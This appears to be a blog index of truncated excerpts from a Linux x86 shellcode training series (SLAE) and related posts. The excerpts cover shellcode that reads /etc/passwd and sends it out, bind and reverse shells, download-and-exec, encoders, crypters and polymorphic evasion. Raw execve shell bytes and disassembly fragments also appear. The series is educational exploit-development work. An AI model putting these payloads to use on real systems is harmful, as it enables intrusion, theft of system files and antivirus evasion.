SLAE: Shellcode read and send file

Because it is so much fun I developed a shellcode, that reads /etc/passwd and then sends the content to port 12345. And here it is: shellcode.c /* ; Author: Daniel Sauder ; Website: ; License ; Shellcode reads /etc/passwd and sends the content to port 12345. ; The file can be […]

SLAE Assignment 7: Crypter

This is the last one and it is about writing a crypter/decrypter. I used python and pycrypto for this task. The execve shellcode starts a shell. The scripts use AES for encryption and decryption. Here is the code for encryption: from Crypto.Cipher import AES plain=("\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80")'Passphrase123456', AES.MODE_CBC, 'IVIVIVIVIVI12345') l=len(plain) r=l%16 p=16-r print "offset: " […]

SLAE Assignment 6: Polymorphic Shellcode

This assignment is about writing polymorphic versions of shellcodes downloaded by Kill all Processes Shellcode I want to start with a simple one, a shellcode for killing processes which can be found at Here is the original assembler code: killall_orig.nasm section .text global _start _start: ; kill(-1, SIGKILL) push byte 37 pop eax […]

SLAE Assignment 5: Shellcode Analysis

Assignment five is about analyzing three different shellcodes, created with msfpayload for Linux/x86. linux/x86/exec I chose the linux/x86/exec shellcode as first example. With: $ msfpayload linux/x86/exec cmd="ls" R | ndisasm -u - it is possible to disassemble the shellcode: 00000000 6A0B push byte +0xb 00000002 58 pop eax 00000003 99 cdq 00000004 52 push edx […]

SLAE Assignment 4: Custom Encoder

This one is about building a custom encoder and decoder. For this I used an insertion / XOR encoder, that splits the shellcode into bytes and inserts a random value. Further the shellcode is decoded using xor with the random value. This way, we have a shellcode, that has nothing to do with the original […]

SLAE Assignment 3: Egghunter Demo

This assignment is about writing a working demo of an egghunter. An egghunter code is basically a piece of code that is searching for a code word (the egg) in the memory. When the egg was found, the egghunter code jumps to the address behind the egg and executes the code at this address. For […]

SLAE Assignment 2: Reverse Shell

What it is about:
•  Create a Shell_Reverse_TCP shellcode
   – Reverse connects to configured IP and Port
   – Execs shell on successful connection
•  IP and Port should be easily configurable
Here is the C code I used for prototyping the assembler code: reverseshellds.c #include <unistd.h> #include <string.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> int main(void) { […]

SLAE Assignment 1: Bind Shell

What it is about:
•  Create a Shell_Bind_TCP shellcode
   – Binds to a port
   – Execs Shell on incoming connection
•  Port number should be easily configurable
Here is the C code for the bind shell, I used it for modelling the assembler code: bindshellds.c #include <unistd.h> #include <string.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> int main(void) […]

An Analysis of Shikata-Ga-Nai

Trivia: Shikata ga nai is Japanese and means something like “nothing can be done about it”. Learning is always fun and I was playing around with making ClamAV signatures. I wondered if it is possible to write a signature that matches the famous Shikata-Ga-Nai shellcode encoder shipping with metasploit. After all I succeeded to […]

Writing a download and exec shellcode

After completing the tasks for the SLAE certification, I went on writing a shellcode for downloading and executing a file. For this task I wanna use wget with execve. But first, some pseudocode: start execve wget file_x chmod +x file_x execve file_x end So that is the plan. See a problem here? Look at the […]